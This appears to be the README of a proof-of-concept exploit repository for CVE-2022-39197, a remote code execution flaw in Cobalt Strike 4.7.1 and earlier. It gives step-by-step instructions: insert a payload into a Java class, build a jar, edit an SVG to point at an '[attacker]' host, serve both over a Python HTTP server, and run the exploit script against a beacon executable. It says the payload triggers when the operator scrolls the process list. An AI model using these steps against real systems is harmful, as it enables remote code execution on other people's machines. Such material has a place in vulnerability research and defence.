
CobaltStrike <= 4.7.1 RCE

Primary LanguagePython

CVE-2022-39197 RCE POC


  • Prepare Payload
  1. Edit Line 19 with your payload in EvilJar/src/main/java/Exploit.java
  2. Build using jar mvn clean compile assembly:single
  3. Move EvilJar-1.0-jar-with-dependencies.jar from EvilJar/target/ to serve/ folder
  4. Edit serve\evil.svg replace [attacker]
  5. Serve using python3 -m http.server 8080
  • Execute Exploit
python3 cve-2022-39197.py beacon.exe

Payload will be triggered as soon as the user scrolls through Process List



Reference Links

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — There’s a great in depth analysis of this vulnerability https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html